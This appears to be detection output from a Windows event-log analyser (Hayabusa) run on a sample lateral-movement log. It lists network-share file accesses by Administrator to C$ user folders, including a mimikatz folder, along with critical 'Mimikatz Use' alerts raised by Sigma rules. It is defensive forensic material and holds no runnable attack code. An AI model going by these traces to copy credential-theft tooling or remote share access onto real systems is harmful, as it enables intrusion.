10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 